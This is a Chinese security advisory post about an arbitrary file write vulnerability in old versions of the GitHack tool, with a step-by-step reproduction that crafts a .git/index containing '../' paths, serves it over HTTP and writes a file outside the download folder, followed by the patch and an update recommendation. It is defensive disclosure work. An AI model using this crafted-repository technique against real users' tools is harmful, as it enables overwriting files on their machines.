GitHack任意文件写入漏洞预警与修复方案

资讯 i春秋聚集地
2022-04-20 8,003

前言

最近几天,关注的lijiejie大佬的GitHack项目提交了commit[1],Change Log写着Fix abitrary file write vulnerability。GitHack任意文件写入漏洞?这里让我们分析一下这个漏洞。

漏洞详情

本漏洞最早是由国外安全研究者justinsteven报告的[2],报告中指出相关软件在使用或访问一些不信任的git仓库的情况下,就可能被精心设计者利用。

GitHack通过gin(一个git的index文件解析)去直接解析.git/index文件,找到工程中所有的文件并下载,当解析到的文件名含有../时,下载的文件就会往上穿越目录存放,遇到同名文件还可以覆盖。只要通过精心的设计的.git/index,就可以把任意文件写入到GitHack工具使用者的机器上。

场景复现

首先构造一个Git仓库:

/# mkdir -p /tmp/test
/# cd /tmp/test
/tmp/test# git init
Initialized empty Git repository in /tmp/test/.git/
/tmp/test# echo nothing |tee other1 other2 other3
nothing
/tmp/test# mkdir -p aabaabaabaabaabaabaabaabaabtmp
/tmp/test# echo "flag{gamelab}" >> aabaabaabaabaabaabaabaabaabtmp/gamelab
/tmp/test# git add .
/tmp/test# git commit -m "add gamelab"
[master (root-commit) 97d***7] add gamelab
 4 files changed, 4 insertions(+)
 create mode 100644 aabaabaabaabaabaabaabaabaabtmp/gamelab
 create mode 100644 other1
 create mode 100644 other2
 create mode 100644 other3
root@cn:/tmp/test# strings .git/index |grep gamelab
&aabaabaabaabaabaabaabaabaabtmp/gamelab

再使用sed替换字符串:

/tmp/test# sed -i 's#aab#../#g' .git/index
/tmp/test# strings .git/index |grep gamelab
&../../../../../../../../../tmp/gamelab

使用python开启HTTP服务,让我们可以通过HTTP来访问当前文件夹的/.git目录。

/tmp/test# python2 -m SimpleHTTPServer 2333
Serving HTTP on 0.0.0.0 port 2333 ...

到这里,准备工作就做好了。

打开另一个终端,使用旧版Githack直接获取泄露的.git文件夹。

/tmp/old# cat /tmp/gamelab
cat: /tmp/gamelab: No such file or directory
/tmp/old# python2 GitHack.py http://127.0.0.1:2333/.git/
[+] Download and parse index file ...
../../../../../../../../../tmp/gamelab
other1
other2
other3
[OK] ../../../../../../../../../tmp/gamelab
[OK] other1
[OK] other2
[OK] other3
/tmp/old# cat /tmp/gamelab
flag{gamelab}

至此,文件已写入。

修复方案

让我们先来看一下GitHack源码都有哪些修改:

最大的改动是在此处加了一个判断 if entry["name"].strip().find('..') < 0:,也就是说如果entry["name"]内没有..,则操作与以前一样,修复后,..就被限制住了。

所以,现在就去更新下你的GitHack工具到2022.4.7最新版。

此外,王一航的GitHacker项目已于2022.3.1修复该漏洞[3]

随想

旧版GitHack这个漏洞存在已久,通过精心设计,可以有效地反制使用者。该环境也可以存在于蜜罐中,作为诱饵来诱捕攻击者。建议各位师傅更新下GitHack。

参考链接

  1. https://github.com/lijiejie/GitHack
  2. https://github.com/justinsteven/advisories/blob/main/2022_git_buried_bare_repos_and_fsmonitor_various_abuses.md
  3. https://github.com/WangYihang/GitHacker


本文作者:i春秋聚集地

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/177491.html

Tags:
点赞: 0 评论:0 收藏: 0
新浪微博 QQ空间 微信扫一扫
评论  (0)
快来写下你的想法吧!

i春秋聚集地
文章数:24 积分: 225

i春秋聚集地旨在为信息安全爱好者提供及时有效的信息渠道和体验平台,欢迎关注公众号(icqedu),和“i春秋学院”微博了解更多网络安全新知识~

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼